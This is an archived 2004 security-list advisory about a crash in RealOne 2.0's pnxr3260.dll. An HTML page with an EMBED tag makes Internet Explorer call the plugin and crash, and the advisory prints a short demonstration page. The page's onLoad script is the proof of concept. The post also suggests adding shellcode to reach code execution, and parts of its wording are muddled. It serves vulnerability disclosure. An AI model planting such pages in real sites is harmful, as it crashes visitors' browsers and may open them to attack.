Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Realone2.0 "pnxr3260.dll" Lets Remote Users IE Browser Crash

from [Wei Li] Network Security [Permanent Link]
Subject: Realone2.0 "pnxr3260.dll" Lets Remote Users IE Browser Crash
Date: 22 Dec 2004 18:30:58 -0000 


Impact:  Denial of service via network 
Version(s):Realone 2.0(build 6.0.11.868)

I. BACKGROUND
   &lt;EMBED ...> puts a browser plugin in the page. A plugin is a special 
program located on the client computer (i.e. not on your web server) that 
handles its own special type of data file. The most common plugins are for 
sounds and movies. The &lt;EMBED ...> tag gives the location of a data file 
that the plugin should handle. 

II. DESCRIPTION
    A vulnerability was found in the IE browser with system installed Realone 
2.0(build 6.0.11.868) in the processing of the 'embed' tag. A remote user can 
create HTML that include &lt;EMBED ...> , when loaded by the client user, will 
cause the client user's browser to call the plugin of Realone,and then the IE 
browser crash. 

The err signature of Iexplorer.exe:
AppName: iexplore.exe    AppVer: 6.0.2800.1106     ModName:pnxr3260.dll
ModVer: 6.0.7.4552       Offset: 00003e98


III. ANALYSIS

An attacker can exploit the above-described vulnerability to execute 
arbitrary code under the permissions of the target user. Successful 
exploitation requires that the attacker convince the end user to install 
realone2.0(build 6.0.11.868. 

Premise:the client user had installed realone2.0(Edition 6.0.11.868).
The following demonstration exploit can cause IE to crash:

<html>
<head>
&lt;script language=javascript>
function dSend() {
document.crash.text;
}
&lt;/script&gt;

</head>
<body onLoad="dSend()">
</head>
<P>&lt;EMBED src=http://w.net/mp3/wind.mp3 ></P>
</body>
</html> 

The attacker can insert shellcode script in above html to execute 
arbitrary code.

IV. Solution
Updated to the newest edition of reaone.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Realone2.0 "pnxr3260.dll" Lets Remote Users IE Browser Crash, Wei Li <=
Previous by Date:  Re: DJB's students release 44 *nix software vulnerability advisories, Steven M. Christey
Next by Date:  [ GLSA 200412-23 ] Zwiki: XSS vulnerability, Luke Macken
Previous by Thread:  [Full-Disclosure] [USN-46-1] TIFF library vulnerability, Martin Pitt
Next by Thread:  [ GLSA 200412-23 ] Zwiki: XSS vulnerability, Luke Macken
Indexes:  [Date] [Thread] [Top] [All Lists]